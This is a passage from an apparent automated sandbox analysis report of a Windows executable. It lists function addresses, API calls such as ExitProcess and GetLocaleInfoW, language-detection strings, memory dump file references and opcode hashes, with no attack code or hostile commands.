                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: fcde7fd86c028c5d188d605d8a5c099e2c5c6e521ec3781deed5696f3d057b19
                                                                                                                                                      • Instruction ID: 9bd1436980abe9389dca7793adfc9160e5d73a85d6ff86bdb935e657276dcbe0
                                                                                                                                                      • Opcode Fuzzy Hash: fcde7fd86c028c5d188d605d8a5c099e2c5c6e521ec3781deed5696f3d057b19
                                                                                                                                                      • Instruction Fuzzy Hash: 91D0A73194C18486F7911754CCB038EBF655F51745F1400FBC44DB51C1937A8F9B8507
                                                                                                                                                      Function 0040D7B0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: fe224db4e1f4a368c28716439e4f7066e8414b30992a0ba0c97ca23ecbf60f4e
                                                                                                                                                      • Instruction ID: b12b89855ee4e669c3cbf46eb01707d99eeecf86db04606955205a1fa3747863
                                                                                                                                                      • Opcode Fuzzy Hash: fe224db4e1f4a368c28716439e4f7066e8414b30992a0ba0c97ca23ecbf60f4e
                                                                                                                                                      • Instruction Fuzzy Hash: 5BC04C36B443288BDBE49A45E8457E8F739EB84733F1001EAD90D912409F711DD4CE51
                                                                                                                                                      Function 0040CCF8 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 3c3db34eb7781049176df19a5cc694f90a3ea73ed2e26338aa25eb99a13a7ad6
                                                                                                                                                      • Instruction ID: b6882c12cff54bfd9b859dee453dfe4b0a3268a62ad0403b98f454c0e73de424
                                                                                                                                                      • Opcode Fuzzy Hash: 3c3db34eb7781049176df19a5cc694f90a3ea73ed2e26338aa25eb99a13a7ad6
                                                                                                                                                      • Instruction Fuzzy Hash: FCC08C30A0C20842EB9117A1C848388BA795F90B01F000096C0082108087B646C58B01

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 0040EC80 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 159COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000800,00000009,00000010,00000008), ref: 0040ED0A
                                                                                                                                                      • _swscanf.LIBCMT ref: 0040ED30
                                                                                                                                                      Strings
                                                                                                                                                      • Got Current OS Language (primaryLangID: %d subLangID: %d) which translates to EAD language %s, xrefs: 0040EE75
                                                                                                                                                      • H+C, xrefs: 0040EE66
                                                                                                                                                      • L+C, xrefs: 0040ED89
                                                                                                                                                      • d+C, xrefs: 0040EDB6
                                                                                                                                                      • Unknown current OS language. (defaulting to English), xrefs: 0040EE59
                                                                                                                                                      • `+C, xrefs: 0040EDC0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoLocale_swscanf
                                                                                                                                                      • String ID: Got Current OS Language (primaryLangID: %d subLangID: %d) which translates to EAD language %s$H+C$L+C$Unknown current OS language. (defaulting to English)$`+C$d+C
                                                                                                                                                      • API String ID: 4240319459-3027554918
                                                                                                                                                      • Opcode ID: 8f6a36c9de7199f1bdbe89a798b914ed15667ce0543bdb7c782b75dfd403bd5a
                                                                                                                                                      • Instruction ID: fdad99bada8757720c833c82a8f7d6c6cf6eab86f3ecb27813d772bb7b7b4850
                                                                                                                                                      • Opcode Fuzzy Hash: 8f6a36c9de7199f1bdbe89a798b914ed15667ce0543bdb7c782b75dfd403bd5a
                                                                                                                                                      • Instruction Fuzzy Hash: B351B831604919C7D7209E6ED98066AF364EB48754F20893BF412E73C1D77DAD1687CE
                                                                                                                                                      Function 00401020 Relevance: 4.5, APIs: 3, Instructions: 47COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LoadResource.KERNEL32(?,?,?,?,?,0042D770), ref: 0040102B
                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,?,0042D770), ref: 0040103A
                                                                                                                                                      • SizeofResource.KERNEL32(?,?,?,?,?,?,?,0042D770), ref: 0040104B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Resource$LoadLockSizeof
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2853612939-0
                                                                                                                                                      • Opcode ID: 2f20284f3294e2baed1ee4f9c24c77794bdb686d89e5afd298025a070179dce0
                                                                                                                                                      • Instruction ID: 3c230f17593eedadb8d1a25c334522914d9658cf97881ecee832d9e389989f04
                                                                                                                                                      • Opcode Fuzzy Hash: 2f20284f3294e2baed1ee4f9c24c77794bdb686d89e5afd298025a070179dce0
                                                                                                                                                      • Instruction Fuzzy Hash: EAF0963370012957CB306B79EC049BBB7DCDA917A63008577F989F76A0E539DCC582A8
                                                                                                                                                      Function 00407E57 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: N@
                                                                                                                                                      • API String ID: 0-1509896676
                                                                                                                                                      • Opcode ID: ae613e775dc3108c7db1608caa2314f256298117eddb46c225e56a1a9229931d
                                                                                                                                                      • Instruction ID: 46131d9779f233d169b6e074d7f52160adf2df670bc17c7086d440347f8f07bf
                                                                                                                                                      • Opcode Fuzzy Hash: ae613e775dc3108c7db1608caa2314f256298117eddb46c225e56a1a9229931d
                                                                                                                                                      • Instruction Fuzzy Hash: F1615A729003158FCB18CF48C49469EBBB2FF85314F5AC5AED8095B366C7B5998ACB84
                                                                                                                                                      Function 0041FDAB Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: N@
                                                                                                                                                      • API String ID: 0-1509896676
                                                                                                                                                      • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                      • Instruction ID: bdf6f9bd4e9c2b627aef2c7ac3213d55244daae19c05cd7de719fac592f1173e
                                                                                                                                                      • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                      • Instruction Fuzzy Hash: 80615B729003158FCB18CF48C49469ABBF2FF85314F1AC5BED8095B366C7B5999ACB84
                                                                                                                                                      Function 0040B709 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 7:EB
                                                                                                                                                      • API String ID: 0-1889068222
                                                                                                                                                      • Opcode ID: f0024cec74ebbbe9ed6354c5ecd8b92f223d080b1e3504fc3efe176741fe6241
                                                                                                                                                      • Instruction ID: a7ed0c96e2b368f480c50e53824cf43a1c1f7ef97a0af1023d6d51b4c014dd48
                                                                                                                                                      • Opcode Fuzzy Hash: f0024cec74ebbbe9ed6354c5ecd8b92f223d080b1e3504fc3efe176741fe6241
                                                                                                                                                      • Instruction Fuzzy Hash: 605128B2D05454ABE714CB54DC90AFF7779EB81305F28C1BBED49A2291CB3C5AC18E89
                                                                                                                                                      Function 00421E53 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0556935cdc178c84ab3d19fc6851343a918f5e490f0f51218d4b1d9ca2ea2850
                                                                                                                                                      • Instruction ID: c3c4d9516621444ab7e0387ffe99d7b6317f0dd7a5a3bc1d0d1cdd7813ece101
                                                                                                                                                      • Opcode Fuzzy Hash: 0556935cdc178c84ab3d19fc6851343a918f5e490f0f51218d4b1d9ca2ea2850
                                                                                                                                                      • Instruction Fuzzy Hash: 75D19E35E0026ACFDF24CFA8D9906EEB7B1FF64300F95426AC815AB351D7785A46CB84
                                                                                                                                                      Function 00415210 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
